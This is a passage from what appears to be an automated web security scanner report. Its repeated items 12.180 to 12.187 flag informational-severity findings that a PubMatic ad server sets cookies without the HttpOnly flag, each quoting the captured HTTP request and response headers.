GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A41&ranreq=0.6655045398510993&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; USCC=ONE

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:14 GMT
Content-Length: 1862
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:14 GMT; path=/
Set-Cookie: pubfreq_27331_22454_1396765360=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:14 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:14 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A44&ranreq=0.1980840740725398&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=29230852&rk1=58438691&rk2=1316239663.676&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:18 GMT
Content-Length: 1567
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:17 GMT; path=/
Set-Cookie: pubfreq_27331_23101_419609244=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:18 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

12.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A7%3A44&ranreq=0.5183736386243254&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=54474395&rk1=24255064&rk2=1316239663.519&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:18 GMT
Content-Length: 1376
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:18 GMT; path=/
Set-Cookie: pubfreq_27331_22455_2121869150=325-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:18 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=661&prevkadIds=23101&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A4%3A17&ranreq=0.724578152410686&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=50772453&rk1=49226856&rk2=1316239456.221&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:51 GMT
Content-Length: 1572
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:51 GMT; path=/
Set-Cookie: pubfreq_27331_23101_1118422103=1058-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:51 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

12.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=136&prevkadIds=22455_22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame32733027331&kltstamp=2011-8-17%201%3A6%3A27&ranreq=0.43855415820144117&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38185087&rk1=62469548&rk2=1316239584.729&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PMDTSHR=cat:; DPPIX_ON=YES; SYNCUPPIX_ON=YES; USCC=ONE; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:01 GMT
Content-Length: 1766
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:01 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1623588958=973-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:01 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame32733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.184. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A5%3A6&ranreq=0.08744174614548683&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=20562183&rk1=63496433&rk2=1316239504.461&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:03:40 GMT
Content-Length: 1381
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:03:40 GMT; path=/
Set-Cookie: pubfreq_27331_22455_752365815=325-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:43:40 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.185. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=661&prevkadIds=23101&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A7%3A44&ranreq=0.8369050135370344&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=29230852&rk1=58438691&rk2=1316239663.676&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:18 GMT
Content-Length: 1573
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:18 GMT; path=/
Set-Cookie: pubfreq_27331_23101_1691138729=1058-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:18 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

12.186. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A23&ranreq=0.44946281472221017&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=48939657&rk1=13158778&rk2=1316239703.749&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:57 GMT
Content-Length: 1568
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:57 GMT; path=/
Set-Cookie: pubfreq_27331_23101_1445244293=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:57 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

12.187. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A36&ranreq=0.6413934300653636&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71482072&rk1=45911150&rk2=1316239536.305&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
